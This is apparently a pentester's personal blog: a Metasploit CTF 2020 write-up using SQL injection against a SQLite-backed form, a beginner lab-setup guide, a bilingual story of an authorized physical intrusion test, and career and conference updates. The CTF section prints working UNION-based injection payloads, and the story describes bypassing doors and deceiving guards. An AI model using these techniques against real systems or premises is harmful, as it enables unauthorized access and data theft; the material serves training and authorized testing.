Metasploit Community CTF 2020 – 2 of Spades

Setting up the attacking machine

Access a browser and use Burp or a proxy

I wanted to explain set up details because i really think it is useful for any one who would like to play CTF and access a browser when the connexion to the attacking machine is made through ssh.

So this introduction aims to be userful for any CTF or even daily practice at you job.

You will have to use -D et -C while launching the command

sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444

-D specify the local port you wish to use for forwarding

-C is the Compression

-i to specify the location of the key file 

Then we need to set up burp under the User options tab (it can also be made under Project options, it depends if you wish to keep permanently or just for a specific project).

Then you can configure your browser proxy as it is usually done when you use Burpsuite (note: this picture is of foxyproxy a firefox add on that i would recommend to anyone who happens to work often on webpentest):


For this CTF my team mate CptButtStuff was using proxychains which is an amazing tool to launch a local program.

Here is how to set it up:

Open a new tab and run ssh again as follow using another port than the one you used for burp:

sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555

Edit the proxychains conf file /etc/proxychains.conf:

socks5 5555

And then you can launch a program you wish using proxychains (here i am using nmap):

proxychains nmap <IP-ADDRESS>

Cool! But how can i get file from the remote host to my local machine?

You can use scp as follow:

scp -i private_key.pem username@remote:/path/to/file /local/dir

The Challenge

Now that we have a set up ready (and not only for this chal 😀 ) we can work on 2 of spades

On port 9001 the service was http (see below the extract of my nmap scan)

9001/tcp open  http        Thin httpd
|_http-server-header: thin

When we browse to this page we get a form:

One of the first thing that comes in mind with a form is sql injection so i tried this, and got a nice error disclosing plenty of info:

' Union select 1, 2 --

This basically means that we need to try to add another col 

And there we go:

Now that we know that the backend DB is sqlite let’s find cool payloads to dump the database:

Table name enumerationSELECT name FROM sqlite_master WHERE type=’table’
Table schema enumerationSELECT sql FROM sqlite_master WHERE type=’table’
Payload chosen

I used this one and got the schema of the table

' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --

The first line is exactly the one we need so now we can query the information we need to get the flag:

' Union SELECT 1, flag, link from hidden --

And there we have our flag we just need to wget our png file and md5sum it to get the flag:

wget http://<IP>/eGHaMBu2XWvRA5cu/2_of_spades.png
md5sum 2_of_spades.png


How to get started with pentesting?

When people ask me about how to get into pentesting, the first i say is that practice is essential. But how to practice pentesting on your own? How to get started with virtual machines?

In this article i am going to explain, how to create a virtual attacking machine. With this machine, you will be able to practice on platforms that have « boxes ». Boxes are vulnerable machines that can be hacked. I will then present some of the website you can use for practice.

Practicing this way is very helpful because it is the closest way to understand pentest (it is not realistic but you will get the core techniques used for pentest)

How to get started ?

Create your virtual attacking machine with Kali Linux

  1. Download Virtualbox and install it:  
  2. Download Virtualbox and install it from here  
  3. Download the lastest kali linux virtualbox image (it is going to be our attacker machine) Make sure to take the virtualbox image and not the vmware one:
  1. Install Kali:
  • Go to virtualbox and click on « File » > « Import Appliance… »
  • Click on the yellow folder and navigate to the image of kali you downloaded, select it and click on open
  • Click on next and then click on import. It will take a little while… And then launch it for the first time. Username should be kali and password kali but you can find this info on their website or on the description of your machine in virtualbox
A screenshot of a social media post

Description generated with very high confidence

What website can you use?

Some great starters

First i would recommend to create an account on tryHackMe here, it’s free! Then you will have to download your configuration file and access to the VPN so you can start hacking away on their machines.

What is awesome about tryhackme is that you even have box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes. So it will not only be useful on tryhackme but also on other platforms and in your daily practice as a pentester (we do sometimes need a VPN to access our customer system to test).

If you are not familiar with VPN here is a wikipedia article explaining what it is. But simply put you can see a VPN as a tool that will give you access to another computer or environment remotely. TryHackMe and other website for pentesting practice will require a VPN so that you can access your practicing environment, usually a vulnerable machine hack.

If you are not familiar with linux, TryHackMe has a box that explains it very well, you even get a cool badge by completing it! You can also practice on, this website is a wargame you will be able to learn about linux and security concepts. If you want a little more explainations on concepts you should definitely go on linuxjourney.

After this you can have a look at the box on TryHackMe that introduces you to pentesting: basic pentesting.

Here is a list of great box (all free) on tryhackmefor beginners:

There are plenty more i really recommend you to have a look around.

Push your skills further with other platforms

You have covered your beginners skills? You want to go further? Here are some useful resources for this.

Code name 23-00 / Nom de code 23-00

Faire défiler le texte pour la version française

This story is largely based on real facts, the names and places have been changed to ensure the anonymity of the characters and entities involved.

One beautiful fall morning, Agent John Durden and I received a mysterious package at the « Beautiful Winter Day » office…

No, our mission does not start with a tape recorder whose tapes burn out at the end of the message.

It starts with a mission order from the Bureau that Agent Effix left on our email inboxes:

« Good morning, Agent Durden and Agent Granville, your mission, if you agree, will be to enter the offices of Sansnom. We must act urgently, Sansnom would like to know if their security system is ready before the unfixable happens. You will have to visit four strategic locations:

The electrical room, the server room, the production room and finally the hardest place to reach the management offices.

If you have no question, this message will self-destruct in a few seconds… or not. »

Excited about our new mission, Agent Durden and I took the first train.

When we arrived at the location, we thought we were in front of a fortress… This imposing building was surrounded by high, sharply pointed gates, its walls were adorned with surveillance cameras, and guards made sure that everyone who entered had a badge to prove their presence.

Also, to make things more difficult for us, any outside person who wanted to enter was escorted to his or her appointment.

This deployment of deterrent security forced us to make our scenarios more complex, but in no way diminished our determination.

In short, only one question occupied our thoughts: How to get in?

We then observed the habits of the local workers. How did they use their badges? Did they sneak into the glass gates in single or multiple groups?

That’s when agent Durden noticed that the glass door reserved for people with reduced mobility had a bottom door large enough to fit through.

We also noted that by a certain time the main security towers were empty, only the scanning cameras were ensuring the security of the building.

Were they operational? We didn’t know.

These small discoveries, our many reconnaissance phases and our multiple scenarios, led us to make an abrupt decision, our eyes concluded: « It will be tonight »…

23-00, dark night, like our camouflages, we were in front of the targeted door waiting for silence around us.

Excitement and apprehension took hold of us, but our determination would guide our entire mission.

Swept away by this mixture of emotions, I suddenly slipped under the narrow doorway.

Joined by my sidekick, we looked at each other for a moment without daring to breathe too deeply, as if we were waiting for something to happen. Nothing happened. In front of us were large staircases.

We went up the first steps and arrived at another staircase, but protected this time.

Undeterred, we went around and found an open door next to it.

So we began our ascent to the various offices in the building.

Our exploration on each floor allowed us to make beautiful discoveries such as blank badges to circulate in the building, precise plans of each room, unlocked mobile phones …

As our research progressed, we were able to find our way around this well-guarded lair which still seemed to selfishly hide some of its mysteries.

In one of the rooms on the third floor, we found temporary access badges, as well as a machine that seemed to be used to print new badges.

Our searches and finds were interrupted by our startle at every sound we thought we heard.

To optimize time, but more importantly to complete our mission, we eventually parted ways.

There, on one of the desks, I found a large booklet containing access codes and instructions for the building’s security systems.

Agent Durden had also made some interesting discoveries, including plans of the building.

Both of us, armed with our valuable information, decided to reach our first target, the management offices. Prior to our mission, I had been able to create a precise profile with information from the management.

When we arrived upstairs, we found that the door security system was much more elaborate than the others, listening only to his courage, Agent Durden began to try to hook the door.

Indeed, agent Durden, always very skilled with his hands, had taken care to forge for us a door-picking equipment that would have made even the greatest locksmiths blush.

While he was testing his new tools, I concentrated on searching for any additional information from the surrounding offices.

Some of the drawers were locked, so the search for their keys intuitively led me to a box containing almost magically the keys to the drawers.

I made interesting discoveries about the schedules of the various members of the management. I made notes and took pictures of everything in case we had to improvise another scenario the next day if we didn’t reach our targets that night.

Officer Durden, who was dealing with a particularly tough door, suggested that I go back down to the third floor offices to pick up a blank badge from the machine we had spotted beforehand, which he hoped would help him with this tedious task.

He didn’t count on a bunch of master keys that he found in a drawer. With these discoveries made, and the master keys tested on a few doors, we took the opportunity of opening the electrical room which we had located, but which we could not open for lack of keys.

Then we went back upstairs to the floor and the offices we had been looking for.

Suddenly as we walked down a corridor we heard the sound of a door slamming very near us, and Officer Durden rushed down a small perpendicular passage which ran along the side of the fully glazed offices and found a dark corner where he crashed against the wall.

Surprised by the urgency of the situation and dazzled by a shower of light on me, I had no choice but to stick to the wall of the passage.

Officer Durden glanced at me, his look distorted by anguish, and then we passed a security guard from behind who miraculously did not turn around and pay no attention to our cleverly concealed presence.

Once the silence came back, which seemed hours later but was only a few seconds, we moved away as quietly and quickly as possible. We resumed our mission at the refractory door to test the passes we had found earlier.

Eureka, it opened, we had reached our first target, which we took pictures of.

We decided to do all the floors we hadn’t done yet in search of our last targets. That’s how we found the server room, however, our master keys didn’t work and the place was even more full of cameras than the rest of the offices.

We spotted a slab in a false floor and discovered that we could lift it to get into the room. We took a picture of it as evidence of a possible bypass of the security system and continued our descent and visit of the top floors.

We paused to study the plans we had found previously and especially the basement plan that intrigued us.

We spotted an area where nothing was indicated and concluded that it was probably another of our most important targets: the production room, which was also our last target, the one that would end our perilous mission.

So we headed there, joyful and carefree of our previous successes, but still discreet. As we descended to the basement we heard a radio noise and finished our descent on velvet steps despite my poor choice of shoes, which had an annoying tendency to squeak on the smooth floor. Once in front of the door of the ultimate room, I opened it carefully while agent Durden took a picture of me saying « the backlight suits you! « which triggered my hilarity and prevented me from immediately seeing the person who was working in this room, which seemed to be a production room indeed.

« What’s going on here? « asked the individual, Agent Durden stammered, « We’re lost”.

Still mixed between the stress of our previous frights and exhilarated by the fact that this room was the end of our mission, I said to our interlocutor:

« My colleague was kind enough to accompany me to retrieve important documents.  » I showed the official envelope that I had retrieved during our visit to the third floor and in which was just some letterhead paper that I had taken in case we had to build future scenarios.

« I had left them in the office, but now we can’t find the exit, where is it please? »

The individual, even more embarrassed than we were, pointed to the security post for the night exit, while a security guard came down and asked us what we were doing here in the middle of the night. We had been in the building for more than five hours. We explained our shameless lies to him again and showed him the temporary badges previously recovered to justify our presence, while joining his colleague.

He asked us more questions and we were forced to give the name of our contact to justify the absence of an escort. The second officer was disconcertingly kind and explained that he was surprised to see us arrive in the basement.

They took our names and our identification papers, and then showed us the gate where we had to badge our way out. So we tried to get through with the temporary badges, which obviously did not allow us to open the glass doors.

So they opened the gates themselves and we were able to leave, relieved and happy about the success of this mission.

After walking a few meters outside, the second officer joined us to collect our temporary badges. « We will provide you with other badges tomorrow, » he apologized, « but we must first clear up this incident which should not have happened.”

We gave him back our badges and were able to leave for the comfort of our homes, with the satisfaction of a mission accomplished and as many emotions as memories in our eyes and hearts.

Cette histoire est largement inspirée de faits réels, les noms et les endroits ont été changés afin de garantir l’anonymat des personnages, et entités concernés.

Un beau matin d’automne, l’agent John Durden et moi-même avons reçu aux bureaux de « Belle journée d’hiver » un mystérieux colis… 

Non, notre mission ne commence pas avec un magnétophone dont les bandes se consument à la fin du message.

Mais bien par un ordre de mission de l’agent Effix du Bureau, laissé sur nos boîtes courriel :

« Bon matin agent Durden et agent Granville, votre mission si vous l’acceptez sera de vous introduire dans les bureaux de Sansnom. Il faut agir de toute urgence, Sansnom souhaiterait savoir si leur système de sécurité est au point avant que l’irréparable ne se produise. Vous allez devoir y visiter quatre endroits stratégiques:

La salle électrique, la salle des serveurs, la salle de production et enfin l’endroit le plus difficile à atteindre les bureaux de la direction.

Si vous n’avez pas de questions, ce message s’autodétruira dans quelques secondes … ou pas»

Excités de notre nouvelle mission, l’agent Durden et moi-même partîmes d’un pas décidé et prîmes le premier train.

À notre arrivée, sur le lieu-dit, nous nous crûmes devant une forteresse. Cette bâtisse imposante était encerclée de hautes grilles aux bouts très pointus, ses murs étaient ornés de caméras de surveillance et des gardes veillaient à ce que chaque personne qui y entrait ait un badge qui justifiait de sa présence. 

Aussi, pour nous compliquer la tâche, toute personne extérieure qui souhaitait y rentrer était escortée à son rendez-vous. 

Ce déploiement de sécurité dissuasive nous obligea à complexifier nos scénarios, mais n’entama en rien notre détermination. 

Une seule question, en somme, occupait nos pensées : Par où rentrer ? 

Nous observâmes alors les habitudes des travailleurs du lieu. Comment utilisaient-ils leur badge ? Se faufilaient-ils à un ou à plusieurs dans les portiques de verres ? 

C’est à ce moment-là que l’agent Durden remarqua que la porte de verre réservée aux personnes à mobilité réduite avait un bas de porte assez grand pour s’y faufiler. 

Nous notâmes également, qu’à partir d’une certaine heure, les tourelles principales étaient vides, seul le balayage des caméras veillait à la sécurité du bâtiment.

Étaient-elles opérationnelles ? Nous n’en savions rien.

Ces minces trouvailles, nos nombreuses phases de reconnaissances et nos multiples scénarios, nous amenâmes à prendre une décision abrupte, nos regards conclurent: « ça sera ce soir »

23-00, nuit noire, comme nos camouflages, nous étions devant la porte ciblée à attendre que le silence se fasse autour de nous.

L’excitation et l’appréhension s’emparèrent alors de nous, mais notre détermination guiderait toute notre mission.

Emportée par ce mélange d’émotions, je me glissais brusquement sous le bas de porte étroit. 

Rejointe par mon acolyte, nous nous regardâmes un instant sans oser respirer trop fort comme si nous attendions que quelque chose se produise. Rien ne se passa. Devant nous se trouvaient de grands escaliers.

Nous montâmes les premières marches et arrivâmes devant un autre escalier, mais protégé cette fois-ci. 

Sans nous décourager, nous fîmes le tour et finîmes par trouver une porte ouverte juste à côté. 

C’est ainsi que nous commençâmes notre ascension vers les différents bureaux du bâtiment.

Notre exploration à chaque étage nous permit de faire de belles trouvailles comme des badges vierges pour circuler dans le bâtiment, des plans précis de chaque salle, des téléphones portables non verrouillés …

Au fur et à mesure de nos recherches, nous nous repérions un peu mieux au sein de cet antre bien gardé qui semblait encore cacher égoïstement quelques-uns de ses mystères.

Dans une des salles du troisième étage, nous trouvâmes des badges d’accès temporaires, ainsi qu’une machine qui semblait servir à imprimer de nouveaux badges. 

Nos recherches et trouvailles connaissaient des intermèdes de sursaut à chaque bruit que l’on croyait entendre.

Pour optimiser le temps, mais surtout pour mener à bien notre mission, nous finîmes par nous séparer.

C’est là que sur un des bureaux, je trouvais un grand livret contenant des codes d’accès et des modes d’emploi des systèmes de sécurité du bâtiment. 

De son côté, l’agent Durden avait également fait de belles trouvailles dont des plans du bâtiment.

Tous deux, forts de nos précieuses informations, nous décidâmes de viser notre première cible, les bureaux de la direction. En amont de notre mission, j’avais pu créer un profil précis avec les informations de la Direction. 

Arrivés à l’étage, nous constatâmes que le système de sécurité des portes était bien plus élaboré que les autres, n’écoutant que son courage l’agent Durden commença à essayer de crocheter la porte.

En effet, l’agent Durden toujours très habile de ses mains avait pris soin de nous forger un matériel de crochetage de porte qui aurait fait rougir les plus grands serruriers.

Pendant qu’il testait ses nouveaux outils, je me concentrais à glaner toutes informations supplémentaires dans les bureaux des alentours. 

Certains tiroirs étaient fermés à clé, la quête de ces clés m’amena intuitivement vers une boîte renfermant presque par « Magie » les clés des tiroirs.

Je fis d’intéressantes découvertes sur l’emploi du temps des divers membres de la direction. Je pris tout en note et en photo pour le cas où nous devions improviser un autre scénario le lendemain si jamais nous n’atteignons pas nos cibles cette nuit.

L’agent Durden ayant à faire à une porte particulièrement coriace, me proposa de redescendre explorer les bureaux du troisième étage afin de prendre un badge vierge de la machine que nous avions repérée au préalable qui, espérait-il, l’aiderait dans cette fastidieuse tâche. 

C’était sans compter sur un trousseau de passe-partout qu’il trouva dans un tiroir. Ces découvertes faites, et le trousseau testé sur quelques portes, nous en profitâmes pour ouvrir la salle électrique que nous avions repérée, mais que nous ne pouvions ouvrir faute de clés.

Nous remontâmes ensuite vers l’étage et les bureaux tant convoités.

Tout à coup alors que nous marchions dans un couloir, nous entendîmes le bruit d’un claquement de porte tout près de nous, l’agent Durden se précipita dans un petit passage perpendiculaire qui longeait des bureaux entièrement vitrés et trouva un coin sombre où il s’écrasa contre le mur. 

Surprise par l’urgence de la situation et éblouie par une douche de lumière sur moi, je n’eus d’autre choix que de me coller au mur du passage. 

L’agent Durden me lança un regard déformé par l’angoisse, puis nous vîmes passer un agent de sécurité de dos qui par miracle ne se retourna pas et ne fit pas attention à nos présences si intelligemment dissimulées. 

Une fois les bruits de pas éloignés, ce qui sembla des heures plus tard, mais ne fut que quelques secondes seulement, nous nous éloignâmes le plus discrètement et le plus rapidement possible. Nous reprîmes notre mission au niveau de la porte réfractaire pour tester les passes que nous avions trouvés précédemment.

Eurêka, elle s’ouvrit, nous avions atteint notre première cible que nous prîmes en photos.

Nous décidâmes de faire tous les étages que nous n’avions pas encore faits à la recherche de nos dernières cibles. C’est ainsi que nous trouvâmes la salle des serveurs toutefois, notre trousseau ne fonctionnait pas et l’endroit était encore plus truffé de caméras que le reste des bureaux. 

Nous repérâmes une dalle dans un faux sol et découvrîmes que nous pouvions la soulever pour nous introduire dans la salle. Nous la prîmes donc en photo en guise de preuve de bypass possible du système de sécurité et continuâmes notre descente et visite des derniers étages.

Nous fîmes une pause pour étudier les plans trouvés précédemment et particulièrement celui du sous-sol qui nous intriguait. 

Nous repérâmes un espace où rien n’était indiqué et nous conclûmes qu’il s’agissait probablement d’une autre de nos cibles les plus importantes : la salle de production, qui était aussi notre dernière cible, celle qui clôturerait notre mission périlleuse.

Nous nous dirigeâmes donc vers cet endroit, joyeux et insouciants de nos précédents succès, mais tout de même encore discret. Au moment de descendre vers le sous-sol nous entendîmes un bruit de radio et finîmes notre descente à pas de velours malgré mon mauvais choix de chaussures qui avaient une fâcheuse tendance à grincer sur le sol lisse. Arrivés devant la porte de la fameuse salle je l’ouvris avec précaution tandis que l’agent Durden me prit en photo en me lançant un « le contre-jour te va à ravir! » ce qui déclencha mon hilarité et m’empêcha de voir tout de suite la personne qui travaillait dans cette salle qui semblait être en effet, une salle de production.

« – Qu’est-ce qu’il se passe? » demanda l’individu, l’agent Durden bredouilla : « Nous sommes perdus ».

Encore mélangée entre le stress de nos frayeurs précédentes et grisés par le fait que cette salle clôturait notre mission je dis à notre interlocuteur :

« Mon collègue a eu la gentillesse de m’accompagner pour récupérer des documents importants ». Je montrais l’enveloppe officielle que j’avais récupérée lors de notre visite du troisième étage et dans laquelle se trouvait juste du papier à entête que j’avais pris pour le cas où nous devions construire des scénarios ultérieurs.

« Je les avais oubliés au bureau, mais maintenant nous ne trouvons plus la sortie, où est-ce s’il vous plait? »

L’individu, encore plus gêné que nous, nous indiqua le poste de sécurité de la sortie de nuit, tandis qu’un agent de sécurité descendit et nous demanda ce que nous faisions ici en pleine nuit. Nous avions, en effet, passé plus de cinq heures dans le bâtiment. Nous lui expliquâmes à nouveau nos mensonges éhontés et lui montrâmes les badges temporaires récupérés précédemment pour justifier notre présence, tout en rejoignant son collègue. Il nous posa davantage de questions et nous fûmes obligés de donner le nom de notre contact pour justifier l’absence d’une escorte. Le deuxième agent, d’une gentillesse déconcertante, nous expliqua avoir été étonné de nous voir arriver au sous-sol.

Ils prirent nos noms et nos papiers d’identité, puis nous indiquèrent le portique où nous devions badger pour sortir. Nous tentâmes donc de passer les badges temporaires qui évidemment ne nous permirent pas d’ouvrir les portes vitrées. 

Ils ouvrirent donc eux-mêmes les portiques et nous pûmes sortir, soulagés et heureux de la réussite de cette mission. 

Après avoir marché quelques mètres dehors, le deuxième agent nous rejoint pour récupérer nos badges temporaires, « nous vous en fournirons d’autres demain, s’excusa-t-il, mais nous devons d’abord tirer au clair cet incident qui n’aurait pas dû se produire »

Nous lui rendîmes nos badges et pûmes partir retrouver le confort de nos foyers, avec la satisfaction d’une mission accomplie et autant d’émotions que de souvenirs dans nos yeux.

Happy birthday C.S. by G.B.

I am proud to announce that my blog is 2 years old!

To celebrate this event, I made a visual recap of my challenge to become a pentester.

To realize my project of becoming a pentester, I relied on Philipe Carré’s « Apprenance » concept.
« Apprenance » is « a lasting set of dispositions… favourable to the act of learning… in all situations: formal or informal, experiential or didactic, self-directed or not, intentional or accidental ».
Philippe Carré, 2005.

My project, involved six steps such as E-learning, CTFs, learning expeditions, internship, conferences and volunteering. In order to document my approach, I created a blog to share my experience and I also built an analysis grid of skills resulting from the whole project.

I am so happy that I achieved my goal by being hired as a pentester at Okiok but my desire to learn remains as strong as ever.

Journey to be continued…

Six mois après, au Canada… / Six month later, in Canada…

Scroll down for English

Cela fait déjà six mois que je suis arrivée au Canada. Il ne va sans dire que je n’ai pas vu le temps passer! Entre deux déménagements, la vie quotidienne, mes activités sportives et associatives et des balades en ville et dans la nature, ma passion pour la cybersécurité et sa démocratisation a pris la plus grande place.

Cet article présente ce que j’ai réalisé à Montréal ces six derniers mois. Je vous relate comment j’ai poursuivi mon auto-formation et comment se déroule mon expérience en tant que spécialiste en tests d’intrusion.

Mon travail chez Okiok

Mon travail chez Okiok est très varié et dépasse de loin mes attentes (voir ici l’article concernant Okiok). J’ai eu différents mandats passionnants qui m’ont permis de découvrir toute la variété de missions possibles dans ce métier. Cet emploi me permet également de m’améliorer en test d’intrusion Web, externes et internes. Récemment, j’ai même eu la chance de faire un test d’intrusion physique (voir mon article sur cette aventure ici). Au delà de toutes mes missions accomplies, j’ai eu l’opportunité d’animer une conférence-midi sur les tests d’intrusion pour présenter le métier à nos collaboratrices et collaborateurs. En ce moment, j’œuvre pour une mission de Blue Team où je développe mes compétences en défense. En tant qu’employée chez Okiok, je peux aussi assister à des conférences et de participer à des compétitions de type Capture the Flag. Entre autres, peu après mon arrivée sur le sol canadien, j’ai notamment eu la chance de participer au fameux Hackfest de la ville de Québec. 

D’autres engagements passionnants

Passionnée par la recherche à partir de sources ouvertes (Open Source Intelligency-OSINT), je me suis inscrite au Missing Person CTF organisé par Tracelabs. Il s’agit d’une super initiative qui permet d’aider les autorités à trouver des personnes disparues. Suite à ma présence à de passionnantes conférences, je me suis confectionnée un badge au village de soudure, je me suis entraînée au crochetage et j’ai piraté des badges de radio haute fréquence!

Au plan de la démocratisation de la cybersécurité et promotion de la cyberpaix, je ne suis pas en reste non plus! En effet, en arrivant au Canada, j’ai été chaleureusement accueillie par Véro, Fyscillia et Sabrine qui organisent des tables rondes pour permettre à des femmes de la cyber de débattre sur différents sujets dans le cadre de NousSommesCyber (WoSEC Montréal). C’est ainsi que j’ai été panéliste chez Ubisoft Montréal (voir ici) pour une table ronde sur la sensibilisation à la cybersécurité.

Lors de mon arrivée, WoSEC Montréal avait pour projet d’organiser des ateliers. C’est alors que Véro m’a proposé de les aider dans cette tâche. Le premier atelier était celui de Diana Whitney qui nous a présenté comment exploiter Eternal blue avec la box Blue de Hackthebox. Ensuite, j’ai animé un atelier d’initiation aux tests d’intrusion web.

Avec la situation sanitaire actuelle (COVID-19), nous avons décidé de maintenir les ateliers à distance. Bientôt, nous aurons la chance de s’initier à l’ingénierie inverse grâce à une présentation d’Emma Spradbrow.

Aussi, lors de mes activités pour NousSommesCyber, j’ai fait la rencontre de Masarah qui m’a proposé de participer au comité Diversité du NorthSec. L’objectif de ce comité est de permettre toutes et à tous, dont celles et ceux issu.e.s des groupes marginalisés, d’assister au NorthSec et de bénéficier des formations proposées lors de l’événement. Cliquez ici pour en savoir plus sur le NorthSec.

Entrevues, conférences et prises de parole

Afin de continuer dans mes démarches de sensibilisation et de partage de mes connaissances, j’ai répondu à plusieurs appels de candidature pour diverses conférences et ateliers. C’est ainsi que j’ai été sélectionnée pour animer une conférence à WomenTechMakers Montréal.

En raison de la pandémie mondiale du coronavirus, l’évènement s’est déroulé entièrement en ligne. Vous pouvez voir ma conférence ici:

Dans le cadre de MeetCyber, Enkelada Ibrahimi m’a contactée via Linkedin afin d’être interviewée pour raconter mon parcours, mon travail et mes projets. Mon entrevue est disponible ici sur Crowdcast.

Être interviewée ne m’a pas empêché de poursuivre mes projets en tant qu’interviewer! En effet, grâce à WoSEC j’ai fait la connaissance de Angela Marafino et Alyssa Miller que j’ai interviewées dans ma série de balados. Leurs parcours sont passionnants et inspirants! Je vous invite à les découvrir ici avec les précédents balados.

Pour améliorer mon aisance à l’oral et continuer à faire de nombreuses conférences, j’ai rejoint un club Toastmasters. C’est une expérience très enrichissante. Le club se réunit hebdomadairement et propose différents formats de participation. Par exemple, il y a un rôle d’évaluateur de la langue, qui consiste à faire un retour sur les termes et expressions utilisées par les divers intervenants. Nous faisons également des improvisations et bien sur des présentations orales.

Pour continuer à apprendre et affiner mes compétences, j’ai également continué mes formations en ligne. J’ai notamment complété le Mooc problem Solving qui m’a permis de développer une méthodologie face aux épreuves de la vie professionnelle. De plus, actuellement, je poursuis la formation de Elearn Security sur les tests d’intrusion web. Enfin, je continue à m’entrainer sur Hackthebox et Certifiedsecure et j’avance sur les exercices du Mossé Institute.

D’ailleurs, si vous êtes une femme intéressée par la cybersécurité le Mossé institute offre une formation gratuite et certifiante. Vous pouvez me contacter via Linkedin pour en savoir plus.

Retrouvez la suite de cette aventure dans un prochain article!

I have spent six months in Montreal already! Between two moves, daily life, sports, associative activities and walks in the city and in nature, my passion for cybersecurity and its democratization has taken the greatest place. This article aim to present what I have done these past six months… How did I continue my self-study? How my journey as a penteste is going?

My work at Okiok is quite diverse and exceeds by far my expectations (see here my article about Okiok). So far, I’ve had various exciting mandates that allowed me to improve my skills in Web and external pentest. Among others things, I have discovered internal and WiFi pentests and all the variety of possible missions in this position. Also, I had the opportunity to perform a physical pentest (see my article about it here).

Beyond these missions, I had the opportunity to host a lunch and learn about pentest to introduce it to our collaborators.

At the moment, I am on a Blue Team mission where I’m developing my skills in cyberdefence.

With Okiok, I also have the opportunity to attend conferences and participate in CTFs.
For example, shortly after my arrival in Canada, I went to the famous Hackfest in Quebec City.
Passionate about Open Source Intelligency (OSINT), I signed up for the Missing Person CTF organized by Tracelabs which is an initiative aiming at helping authorities finding missing persons. After attending exciting conferences, I went to the soldering village to craft myself a badge, practiced lockpicking and hacked RFID badges!

As for democratizing cyber security and promoting cyberpeace, I have plenty of opportunities either!

Indeed, when I arrived in Canada, I was warmly welcomed by Véro, Fyscillia and Sabrine who are all members of the WeAreCyber (WoSEC Montreal). Every year, the team organize panels allowing women from the cyber sector to debate on different topics related to cybersecurity. It is within this context, that I took part as panelist at a round table organized by Ubisoft Montreal (see here) that focused on cybersecurity awarness .

Shortly after my arrival, WoSEC Montreal was planning to conduct workshops. Therefore, Véro offered me to join the team and help in this task. The first workshop was given by Diana Whitney. She showed us how to exploit Eternal blue with Hactkthebox’s « Blue » box. Then, I led an initiation workshop on web pentesting.

Due to the current pandemic outbreak, we decided to run all workshops online. Very soon, we are looking forward to having an introduction on reverse engineering given by Emma Spradbrow.

Also, in the context of my activities for WeAreCyber, I met Masarah who offered me to participate to the Outreach committee of NorthSec.

The goal: to allow all audiences to attend NorthSec and benefit from the training offered at the conference.

To learn more about NorthSec, click here!

In order to continue my efforts to raise awareness and share my knowledge, I have submitted several Call For Paper. The efforts have been successful as I was selected to host a talk at WomenTechMakers Montreal.

My talk for WomenTechMakers Montreal, in french

Due to COVID-19 the event took place remotely, so you can watch and listen my talk by clicking on the link above.

As part of MeetCyber, Enkelada Ibrahimi contacted me via Linkedin and I was interviewed about my background, my work and my projects. The podcast is avalaible here on Crowdcast.

Being interviewed didn’t stop me from continuing my interviews! Indeed, thanks to WoSEC I met Angela Marafino and Alyssa Miller who I interviewed in my podcast series.

Their backgrounds are exciting and very inspiring!

To improve my public speaking skills and continue to give many talks, I joined a Toastmasters club. It’s a very enriching experience, the club meets once a week and offers different participation formats. For example, there is a role of language assessor, which consists of reviewing the terms and expressions used by the various speakers. We also do improvisations and of course oral presentations.

Because I’m never done with learning new skills and improve myself

To continue to learn and refine my skills, I have continued my online training. In particular, I validated the Mooc problem Solving, which allowed me to develop a methodology for dealing with the challenges of professional life. In the context of my employment at Okiok, I am currently doing the Elearn Security training about Web pentesting. Finally, I continuously train on Hackthebox and Certifiedsecure and I go further on the exercises of the Mossé Institute.

Moreover, if you are a woman interested in cyber security the Mossé Institute offers free training and certification. You can contact me via Linkedin to find out more.

Find the sequel of this adventure in another article soon!…

International Cyber Security Summer School 2019 (ICSSS 2019)

ICSSS 2019 in The Hague

In the end of august i participated to ICSSS 2019 in The Hague (Netherlands). We had different lectures about cybersecurity in various places such as Leiden University, NCI Agency, Europol, The Hague Security Delta, Dutch innovation factory. We also had the full week to work on different challenges in groups. My challenge was about Cyber resilience for The Hague Center for Strategic Studies.

What is ICSSS 2019?

« The International Cyber Security Summer School (ICSSS) is an annual summer school, originally organised by NATO C&I Agency, Europol, the Netherlands Ministry of Defence Cyber Command, Leiden University and The Hague Security Delta. « 

Source: ICSSS website

What happened?

Day 1

Day 1 of ICSSS 2019

Useful to know about Day 1:

The ice breaker game:

The afternoon was animated by Ákos Wetters. Akos offered an app for an Ice Breaker game called SpotYet. We had to take a selfie and answer questions about ourselves. Then, the app showed us the picture of the person we had to talk to and after finding the person, we could talk about our answers or about anything else we fancied. It gave us the possibility to have one on one conversation instead of having to introduce ourselves in front of 60 other persons. Here is a map of our interconnection during the event made by SpotYet.

SpotYet interconnexions map of our ice breaker game

A blue team vs red team workshop

Scenario of red team versus blue team game

The red team versus blue team game was made by Leila Taghizadeh. The read team is suppose to hack the blue team. The red team had to explain the process they would use to hack the company. The blue team had to explain how they would protect themselves.

ICSSS Tweet about Day 1

Day 2

Day 2 of ICSSS 2019

Useful to know about Day 2:

  • The lecture of the morning by Professor Bibi Van Den Berg was a broad overview of cyberspace. The following subjects were tackled: Human error and cybersecurity incidents, Law as an incentive to prevent human error, alternative way of steering human behavior.
  • The workshop of the afternoon was made by Els de Busser. It was an exercise about NotPetya. We were divided in groups some represented the Russian and the others, the Ukrainian. We had to build an argumentation to defend the team we were in so that we could give our point of view in front of the International court of law.
ICSSS tweet about Day 2

Day 3

Day 3 at ICSSS 2019

Useful to know about Day 3:

The subject tackles in the keynotes were as follow: Introduction to the NCI Agency, Cyber Security at the NCI Agency, Career opportunities at the NCI Agency.

NCI Agency’s tweet about Day 3

Day 4

Day 4 at ICSSS 2019

Useful to know about Day 4:

  • The keynotes were made by Maia Spilman and Michael Payne.
  • In the first workshop of the afternoon we saw how to transform a Raspberry Pi into a hacking tool. It was lead by Niels Vonk and Ramon Janssen
  • In the second workshop of the afternoon we worked on a home made version of OWASP Juice shop. It was lead by Wout Debaenst and Ricardo Sanchez Marchand.
ICSSS tweet about Day 4

Day 5

Day 5 at ICSSS 2019

Useful to know about Day 5:

The subjects tackled in the morning lecture by Jarek Jakubcek were : Introduction to Europol EC3 and latest cybercrime trends and threats, Use and abuse of cryptocurrencies, Cryptocurrency investigations and strategic investigations, Blockchain, OSINT and the Europol on-the-job experience.

Europol’s tweet about Day 5

Day 6

Day 6 at ICSSS 2019

